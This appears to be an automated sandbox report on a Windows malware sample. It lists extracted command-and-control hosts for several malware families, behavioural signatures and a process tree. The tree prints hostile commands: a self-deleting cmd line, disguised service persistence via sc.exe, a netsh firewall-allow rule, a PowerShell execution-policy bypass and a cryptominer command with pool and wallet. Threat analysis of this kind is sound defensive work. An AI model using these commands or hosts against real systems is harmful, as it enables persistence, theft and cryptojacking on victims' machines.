Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    16-12-2021 05:03

General

  • Target

    f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf.exe

  • Size

    333KB

  • MD5

    1eb2d18d37a6aff8d21382cf48081965

  • SHA1

    0fe5f8973024e339bc2c008f485400969c7854f9

  • SHA256

    f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf

  • SHA512

    84ce87a4948b5699837e57db0ff937ac333c175165de1b3c9e86cf93baff0ca540d24b2e7aeb0b383c5148fbfd2c418ad66f27bf309d6c0a0db8cbc6cb20477c

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

3372020928

C2

jeliskvosh.com

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

22

C2

195.133.47.114:38127

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.77.127.230:8888

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • VKeylogger

    A keylogger first seen in Nov 2020.

  • VKeylogger Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf.exe
    "C:\Users\Admin\AppData\Local\Temp\f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Users\Admin\AppData\Local\Temp\f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf.exe
      "C:\Users\Admin\AppData\Local\Temp\f94154b2974223c9f85f79f20d7cfd063ac3b7b37d2d4cefe05901b938dd2ddf.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:968
  • C:\Users\Admin\AppData\Local\Temp\1038.exe
    C:\Users\Admin\AppData\Local\Temp\1038.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:3500
  • C:\Users\Admin\AppData\Local\Temp\18F4.exe
    C:\Users\Admin\AppData\Local\Temp\18F4.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\18F4.exe
      C:\Users\Admin\AppData\Local\Temp\18F4.exe
      2⤵
      • Executes dropped EXE
      PID:1656
  • C:\Users\Admin\AppData\Local\Temp\2430.exe
    C:\Users\Admin\AppData\Local\Temp\2430.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1620
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2913.dll
    1⤵
    • Loads dropped DLL
    PID:2828
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2828 -s 504
      2⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1820
  • C:\Users\Admin\AppData\Local\Temp\3539.exe
    C:\Users\Admin\AppData\Local\Temp\3539.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:1032
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3539.exe" & exit
      2⤵
        PID:3872
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 5
          3⤵
          • Delays execution with timeout.exe
          PID:3708
    • C:\Users\Admin\AppData\Local\Temp\39AF.exe
      C:\Users\Admin\AppData\Local\Temp\39AF.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2268
    • C:\Users\Admin\AppData\Local\Temp\420C.exe
      C:\Users\Admin\AppData\Local\Temp\420C.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3984
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fniokvav\
        2⤵
          PID:1184
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zzvlnrhy.exe" C:\Windows\SysWOW64\fniokvav\
          2⤵
            PID:688
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create fniokvav binPath= "C:\Windows\SysWOW64\fniokvav\zzvlnrhy.exe /d\"C:\Users\Admin\AppData\Local\Temp\420C.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:2756
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description fniokvav "wifi internet conection"
              2⤵
                PID:3036
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start fniokvav
                2⤵
                  PID:3936
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:900
                • C:\Users\Admin\AppData\Local\Temp\58A2.exe
                  C:\Users\Admin\AppData\Local\Temp\58A2.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:1720
                  • C:\Users\Admin\AppData\Local\Temp\58A2.exe
                    C:\Users\Admin\AppData\Local\Temp\58A2.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1544
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noexit
                      3⤵
                      • Blocklisted process makes network request
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2112
                • C:\Users\Admin\AppData\Local\Temp\5CDA.exe
                  C:\Users\Admin\AppData\Local\Temp\5CDA.exe
                  1⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:3520
                • C:\Users\Admin\AppData\Local\Temp\5EEE.exe
                  C:\Users\Admin\AppData\Local\Temp\5EEE.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2460
                • C:\Users\Admin\AppData\Local\Temp\621B.exe
                  C:\Users\Admin\AppData\Local\Temp\621B.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  PID:2472
                  • C:\Windows\SysWOW64\explorer.exe
                    "C:\Windows\SysWOW64\explorer.exe"
                    2⤵
                    • Adds Run key to start application
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of FindShellTrayWindow
                    PID:904
                • C:\Users\Admin\AppData\Local\Temp\6B63.exe
                  C:\Users\Admin\AppData\Local\Temp\6B63.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1072
                • C:\Windows\SysWOW64\fniokvav\zzvlnrhy.exe
                  C:\Windows\SysWOW64\fniokvav\zzvlnrhy.exe /d"C:\Users\Admin\AppData\Local\Temp\420C.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2032
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:2464
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                        PID:1988
                  • C:\Users\Admin\AppData\Local\Temp\7C8B.exe
                    C:\Users\Admin\AppData\Local\Temp\7C8B.exe
                    1⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2720
                  • C:\Users\Admin\AppData\Local\Temp\85B4.exe
                    C:\Users\Admin\AppData\Local\Temp\85B4.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1252
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im 85B4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\85B4.exe" & del C:\ProgramData\*.dll & exit
                      2⤵
                        PID:3668
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im 85B4.exe /f
                          3⤵
                          • Kills process with taskkill
                          PID:3436
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 6
                          3⤵
                          • Delays execution with timeout.exe
                          PID:1528
                    • C:\Users\Admin\AppData\Local\Temp\942C.exe
                      C:\Users\Admin\AppData\Local\Temp\942C.exe
                      1⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1184
                    • C:\Users\Admin\AppData\Local\Temp\F58.exe
                      C:\Users\Admin\AppData\Local\Temp\F58.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1448
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                      • Accesses Microsoft Outlook profiles
                      • outlook_office_path
                      • outlook_win_path
                      PID:1712
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:4000

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/968-117-0x0000000000400000-0x0000000000409000-memory.dmp

                        Filesize

                        36KB

                      • memory/1032-168-0x0000000000730000-0x000000000074C000-memory.dmp

                        Filesize

                        112KB

                      • memory/1032-169-0x0000000000400000-0x00000000004D6000-memory.dmp

                        Filesize

                        856KB

                      • memory/1032-167-0x00000000007E6000-0x00000000007F8000-memory.dmp

                        Filesize

                        72KB

                      • memory/1072-250-0x0000000076A30000-0x0000000076B21000-memory.dmp

                        Filesize

                        964KB

                      • memory/1072-255-0x0000000002C70000-0x0000000002CB5000-memory.dmp

                        Filesize

                        276KB

                      • memory/1072-246-0x0000000000FA0000-0x000000000103C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1072-251-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1072-263-0x0000000005800000-0x0000000005801000-memory.dmp

                        Filesize

                        4KB

                      • memory/1072-247-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1072-253-0x00000000727F0000-0x0000000072870000-memory.dmp

                        Filesize

                        512KB

                      • memory/1072-249-0x0000000076F80000-0x0000000077142000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/1544-179-0x0000000000400000-0x000000000040F000-memory.dmp

                        Filesize

                        60KB

                      • memory/1544-174-0x0000000000400000-0x000000000040F000-memory.dmp

                        Filesize

                        60KB

                      • memory/1620-155-0x0000000070A40000-0x0000000070A8B000-memory.dmp

                        Filesize

                        300KB

                      • memory/1620-147-0x00000000760A0000-0x0000000076624000-memory.dmp

                        Filesize

                        5.5MB

                      • memory/1620-145-0x0000000005500000-0x0000000005501000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-140-0x00000000727F0000-0x0000000072870000-memory.dmp

                        Filesize

                        512KB

                      • memory/1620-137-0x00000000002E0000-0x00000000002E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-144-0x00000000052F0000-0x00000000052F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-146-0x0000000005350000-0x0000000005351000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-136-0x0000000076A30000-0x0000000076B21000-memory.dmp

                        Filesize

                        964KB

                      • memory/1620-134-0x0000000076F80000-0x0000000077142000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/1620-129-0x00000000002E0000-0x0000000000349000-memory.dmp

                        Filesize

                        420KB

                      • memory/1620-150-0x00000000053E0000-0x00000000053E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-143-0x0000000005A00000-0x0000000005A01000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-149-0x0000000074BE0000-0x0000000075F28000-memory.dmp

                        Filesize

                        19.3MB

                      • memory/1620-132-0x0000000002890000-0x00000000028D5000-memory.dmp

                        Filesize

                        276KB

                      • memory/1620-130-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1620-154-0x0000000005390000-0x0000000005391000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-238-0x0000000009390000-0x0000000009391000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-201-0x0000000007E20000-0x0000000007E21000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-193-0x0000000004A00000-0x0000000004A01000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-188-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-187-0x0000000007C40000-0x0000000007C41000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-228-0x0000000007010000-0x0000000007011000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-217-0x0000000002F60000-0x0000000002F61000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-186-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-185-0x0000000007300000-0x0000000007301000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-180-0x0000000002F60000-0x0000000002F61000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-194-0x0000000004A02000-0x0000000004A03000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-182-0x00000000049A0000-0x00000000049A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-183-0x00000000074C0000-0x00000000074C1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2112-181-0x0000000002F60000-0x0000000002F61000-memory.dmp

                        Filesize

                        4KB

                      • memory/2268-178-0x0000000000400000-0x00000000004CD000-memory.dmp

                        Filesize

                        820KB

                      • memory/2268-170-0x00000000006B6000-0x00000000006C7000-memory.dmp

                        Filesize

                        68KB

                      • memory/2372-116-0x00000000001E0000-0x00000000001E9000-memory.dmp

                        Filesize

                        36KB

                      • memory/2460-202-0x00000000002E0000-0x00000000002E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2460-213-0x0000000004A30000-0x0000000005036000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/2472-317-0x0000000000820000-0x00000000008CE000-memory.dmp

                        Filesize

                        696KB

                      • memory/2472-315-0x0000000000030000-0x000000000003A000-memory.dmp

                        Filesize

                        40KB

                      • memory/2472-316-0x0000000000400000-0x000000000081A000-memory.dmp

                        Filesize

                        4.1MB

                      • memory/2720-328-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-312-0x00000000024F0000-0x00000000024F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-304-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-287-0x00000000028B0000-0x00000000028B1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-307-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-306-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-331-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-302-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-308-0x00000000024C0000-0x00000000024C1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-310-0x0000000000CD0000-0x0000000000CD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-309-0x00000000024D0000-0x00000000024D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-299-0x0000000002910000-0x0000000002911000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-311-0x00000000024A0000-0x00000000024A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-332-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-314-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-292-0x00000000028E0000-0x00000000028E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-313-0x0000000002510000-0x0000000002511000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-298-0x0000000002940000-0x0000000002941000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-294-0x00000000028D0000-0x00000000028D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-319-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-320-0x0000000002830000-0x0000000002831000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-321-0x0000000002850000-0x0000000002851000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-322-0x00000000027F0000-0x00000000027F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-324-0x0000000002820000-0x0000000002821000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-325-0x0000000002810000-0x0000000002811000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-323-0x0000000002870000-0x0000000002871000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-327-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-326-0x0000000002890000-0x0000000002891000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-329-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-296-0x0000000006580000-0x0000000006581000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-330-0x00000000035D0000-0x00000000035D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-300-0x00000000035E0000-0x00000000035E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-333-0x00000000029A0000-0x00000000029A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-334-0x00000000029B0000-0x00000000029B1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-335-0x0000000002960000-0x0000000002961000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-289-0x0000000002920000-0x0000000002921000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-285-0x0000000002900000-0x0000000002901000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-283-0x00000000028F0000-0x00000000028F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2720-280-0x0000000000C20000-0x0000000000C80000-memory.dmp

                        Filesize

                        384KB

                      • memory/2828-159-0x00000000007C0000-0x00000000007CA000-memory.dmp

                        Filesize

                        40KB

                      • memory/3028-163-0x0000000002B70000-0x0000000002B86000-memory.dmp

                        Filesize

                        88KB

                      • memory/3028-119-0x00000000008E0000-0x00000000008F6000-memory.dmp

                        Filesize

                        88KB

                      • memory/3028-240-0x0000000004F30000-0x0000000004F46000-memory.dmp

                        Filesize

                        88KB

                      • memory/3500-133-0x00000000001D0000-0x00000000001D9000-memory.dmp

                        Filesize

                        36KB

                      • memory/3500-142-0x0000000000400000-0x00000000004CD000-memory.dmp

                        Filesize

                        820KB

                      • memory/3520-239-0x0000000002AE5000-0x0000000002AE6000-memory.dmp

                        Filesize

                        4KB

                      • memory/3520-197-0x0000000002AE0000-0x0000000002AE2000-memory.dmp

                        Filesize

                        8KB

                      • memory/3984-195-0x0000000000530000-0x0000000000543000-memory.dmp

                        Filesize

                        76KB

                      • memory/3984-196-0x0000000000400000-0x00000000004D5000-memory.dmp

                        Filesize

                        852KB